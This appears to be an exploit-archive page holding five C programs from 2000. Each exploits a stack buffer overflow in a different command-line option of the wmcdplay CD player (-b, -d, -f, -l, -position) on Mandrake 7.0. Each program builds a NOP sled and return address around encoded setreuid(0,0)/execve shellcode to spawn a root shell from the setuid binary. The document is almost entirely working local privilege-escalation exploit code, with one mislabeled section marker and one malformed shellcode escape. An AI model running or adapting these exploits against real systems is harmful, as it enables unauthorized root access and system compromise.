wmcdplay-exp.c

wmcdplay-exp.c: Posted Mar 24, 2000; Authored by Larry W. Cashdollar | Site team-teso.net; 5 exploits for wmcdplay (A cd player designed for WindowMaker - Release 1.0 Beta1) Tested on Mandrake 7.0.; tags | exploit; systems | linux, mandrake; SHA-256 | b3df24fce3105f322d4f200071911aafe6bd5667f3ca8f7cca758ea51fc67a99; Download | Favorite | View
wmcdplay-exp.c

wmcdplay - A cd player designed for WindowMaker
05/09/98  Release 1.0 Beta1

Originaly discovered by the TESO crew.

1   -f artwork_file        load the specified artwork file
2   -l led_color           use the specified color for led displays
3   -b back_color          use the specified color for backgrounds
4   -d cd_device           use specified device  (rather than
/dev/cdrom)
5   -position position     set window position   (see X manual pages)



1. Overflows at buffersize 256.
2. Overflows at buffersize 534.
3. Overflows at buffersize 786. hmmm.
4. Overflows at buffersize 786. hmmm.
5. Overflows at buffersize 1300.


<------------------------ back_color exploit --------------------->
/*Overflows the -b arg (back_color) buffer in wmcdplay due to a bad
sprintf
 *call. This seems to be how most of the command line arguments are
called.
 *Larry W. Cashdollar 3/13/2000. lwc@vapid.dhs.org
 *$:> gcc wmcdplay-bexp.c -o wmb ;./wmb <offset>
 *offset 400 worked for me on Mandrake 7.0
 *Credit: TESO Crew http://teso.scene.at/ for finding the original hole.

 */


#include <stdio.h>
#include <stdlib.h>

#define NOP 0x90                /*no operation skip to next instruction.
*/
#define LEN 786                 /*our buffersize. */


char shellcode[] =              /*execve with setreuid(0,0) and no '/'
hellkit v1.1 */

"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa"

  "\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01"

"\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11"


"\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9"


"\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01"


"\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c"

  "\xc2\x91";


/*Nab the stack pointer to use as an index into our nop's*/
long
get_sp ()
{
  __asm__ ("mov %esp, %eax");
}

int
main (int argc, char *argv[])
{
  char buffer[LEN];
  int i;

  long retaddr = get_sp ();

/*Fill the buffer with our new address to jump to esp + offset */
  for (i = 0; i < LEN; i += 4)
    *(long *) &buffer[i] = retaddr + atoi (argv[1]);

/*copy the NOPs  in to the buffer leaving space for shellcode and
pointers*/

  printf ("Jumping to address %x BufSize %d\n", retaddr + atoi
(argv[1]),
          LEN);

  for (i = 0; i < (LEN - strlen (shellcode) - 50); i++)
    *(buffer + i) = NOP;

/*copy the shell code into the buffer*/
  memcpy (buffer + i, shellcode, strlen (shellcode));

  execl ("/usr/X11R6/bin/wmcdplay", "wmcdplay", "-b", buffer, 0);

}
<------------------------ back_color exploit ----------------------->

<------------------------ cd_device exploit --------------------->


/*Overflows the -d arg (cd device) buffer in wmcdplay due to a bad
 *sprintf call.
 *This seems to be how most of the command line arguments are called.
 *Larry W. Cashdollar 3/13/2000. lwc@vapid.dhs.org
 *$:> gcc wmcdplay-bexp.c -o wmb ;./wmb <offset>
 *offset 400 worked for me on Mandrake 7.0
 *Credit: TESO Crew http://teso.scene.at/ for finding the original -d
hole.
 */


#include <stdio.h>
#include <stdlib.h>

#define NOP 0x90                /*no operation skip to next instruction.
*/
#define LEN 1045                /*our buffersize. */

char shellcode[] =              /*generic shellcode with out '/' ie not
mine */

"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x68\x80\x36\x01\x46\xe2\xfa"

  "\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01"

"\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xbb\x11"


"\x01\x01\x8c\xba\x2b\xee\xfe\xfe\x30\xd3\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c"


"\xf9\xb9\x16\x01\x01\x01\x88\xd7\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01"


"\x01\x01\x88\xff\x52\x88\xf2\xcc\x81\x5a\x5f\x5e\x88\xed\x5c\xc2\0x91\0x91\0x91";

/*Nab the stack pointer to use as an index into our nop's*/
long
get_sp ()
{

  __asm__ ("mov %esp, %eax");

}

int
main (int argc, char *argv[])
{
  char buffer[LEN];
  int i;

  long retaddr = get_sp ();

/*Fill the buffer with our new address to jump to esp + offset */
  for (i = 0; i < LEN; i += 4)
    *(long *) &buffer[i] = retaddr + atoi (argv[1]);

/*copy the NOPs  in to the buffer leaving space for shellcode and
pointers*/

  printf ("Jumping to address %x, BufSize %d\n", retaddr + atoi
(argv[1]),
          LEN);

  for (i = 0; i < (LEN - strlen (shellcode) - 50); i++)
    *(buffer + i) = NOP;

/*copy the shell code into the buffer*/
  memcpy (buffer + i, shellcode, strlen (shellcode));
  execl ("/usr/X11R6/bin/wmcdplay", "wmcdplay", "-d", buffer, 0);

}

<------------------------ cd_device exploit ----------------------->

<------------------------ art_file exploit ------------------------->

/*Overflows the -f arg (artfile) buffer in wmcdplay due to a bad
 *sprintf  call.
 *This seems to be how most of the command line arguments are called.
 *Larry W. Cashdollar 3/13/2000. lwc@vapid.dhs.org
 *$:> gcc wmcdplay-fexp.c -o wmf ;./wmf <offset>
 *offset 400 worked for me on Mandrake 7.0
 *Credit: TESO Crew http://teso.scene.at/ for finding the original hole.

 */



#include <stdio.h>
#include <stdlib.h>

#define NOP 0x90                /*no operation skip to next instruction.
*/
#define LEN 256                 /*our buffersize. */


char shellcode[] =              /*execve with setreuid(0,0) and no '/'
hellkit v1.1 */

"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa"

  "\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01"

"\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11"


"\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9"


"\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01"


"\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c"

  "\xc2\x91";


/*Nab the stack pointer to use as an index into our nop's*/
long
get_sp ()
{
  __asm__ ("mov %esp, %eax");
}

int
main (int argc, char *argv[])
{
  char buffer[LEN];
  int i;

  long retaddr = get_sp ();

/*Fill the buffer with our new address to jump to esp + offset */
  for (i = 0; i < LEN; i += 4)
    *(long *) &buffer[i] = retaddr + atoi (argv[1]);

/*copy the NOPs  in to the buffer leaving space for shellcode and
pointers*/

  printf ("Jumping to address %x BufSize %d\n", retaddr + atoi
(argv[1]),
          LEN);

  for (i = 0; i < (LEN - strlen (shellcode) - 50); i++)
    *(buffer + i) = NOP;

/*copy the shell code into the buffer*/
  memcpy (buffer + i, shellcode, strlen (shellcode));

  execl ("/usr/X11R6/bin/wmcdplay", "wmcdplay", "-f", buffer, 0);

}

<------------------------ cd_device exploit ----------------------->

<------------------------ led_color exploit ------------------------>

/*Overflows the -l arg (led_color) buffer in wmcdplay due to a bad
 *sprintf  call.
 *This seems to be how most of the command line arguments are called.
 *Larry W. Cashdollar 3/13/2000. lwc@vapid.dhs.org
 *$:> gcc wmcdplay-lexp.c -o wml ;./wml <offset>
 *offset 390 worked for me on Mandrake 7.0
 *Credit: TESO Crew http://teso.scene.at/ for finding the original -d
hole.
 */



#include <stdio.h>
#include <stdlib.h>

#define NOP 0x90                /*no operation skip to next instruction.
*/
#define LEN 534                 /*our buffersize. */


char shellcode[] =              /*execve with setreuid(0,0) and no '/'
hellkit v1.1 */

"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa"

  "\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01"

"\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11"


"\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9"


"\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01"


"\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c"

  "\xc2\x91";


/*Nab the stack pointer to use as an index into our nop's*/
long
get_sp ()
{
  __asm__ ("mov %esp, %eax");
}

int
main (int argc, char *argv[])
{
  char buffer[LEN];
  int i;

  long retaddr = get_sp ();

/*Fill the buffer with our new address to jump to esp + offset */
  for (i = 0; i < LEN; i += 4)
    *(long *) &buffer[i] = retaddr + atoi (argv[1]);

/*copy the NOPs  in to the buffer leaving space for shellcode and
pointers*/

  printf ("Jumping to address %x BufSize %d\n", retaddr + atoi
(argv[1]),
          LEN);

  for (i = 0; i < (LEN - strlen (shellcode) - 50); i++)
    *(buffer + i) = NOP;

/*copy the shell code into the buffer*/
  memcpy (buffer + i, shellcode, strlen (shellcode));

  execl ("/usr/X11R6/bin/wmcdplay", "wmcdplay", "-l", buffer, 0);

}

<------------------------ led_color exploit------------------------>

<------------------------ position exploit ------------------------->

/*Overflows the -position arg (position) buffer in wmcdplay due to a
 *bad sprintf call.
 *This seems to be how most of the command line arguments are called.
 *Larry W. Cashdollar 3/13/2000. lwc@vapid.dhs.org
 *$:> gcc wmcdplay-bexp.c -o wmb ;./wmb <offset>
 *offset 400 worked for me on Mandrake 7.0
 *Credit: TESO Crew http://teso.scene.at/ for finding the original -d
hole.
 */



#include <stdio.h>
#include <stdlib.h>

#define NOP 0x90                /*no operation skip to next instruction.
*/
#define LEN 1300                /*our buffersize. */


char shellcode[] =              /*execve with setreuid(0,0) and no '/'
hellkit v1.1 */

"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa"

  "\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01"

"\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11"


"\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9"


"\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01"


"\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c"

  "\xc2\x91";


/*Nab the stack pointer to use as an index into our nop's*/
long
get_sp ()
{
  __asm__ ("mov %esp, %eax");
}

int
main (int argc, char *argv[])
{
  char buffer[LEN];
  int i;

  long retaddr = get_sp ();

/*Fill the buffer with our new address to jump to esp + offset */
  for (i = 0; i < LEN; i += 4)
    *(long *) &buffer[i] = retaddr + atoi (argv[1]);

/*copy the NOPs  in to the buffer leaving space for shellcode and
pointers*/

  printf ("Jumping to address %x BufSize %d\n", retaddr + atoi
(argv[1]),
          LEN);

  for (i = 0; i < (LEN - strlen (shellcode) - 50); i++)
    *(buffer + i) = NOP;

/*copy the shell code into the buffer*/
  memcpy (buffer + i, shellcode, strlen (shellcode));

  execl ("/usr/X11R6/bin/wmcdplay", "wmcdplay", "-position", buffer, 0);

}
<------------------------ position exploit ------------------------->
Top Authors In Last 30 Days

Red Hat 235 files
Ubuntu 50 files
Debian 19 files
LiquidWorm 15 files
Apple 9 files
Gentoo 5 files
Google Security Research 3 files
Alter Prime 3 files
Pierre Kim 2 files
Jann Horn 2 files
File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,945)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,337)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,987)
UNIX (9,475)
UnixWare (188)
Windows (6,784)
Other
wmcdplay-exp.c

wmcdplay-exp.c

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

wmcdplay-exp.c

Share This

wmcdplay-exp.c

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems
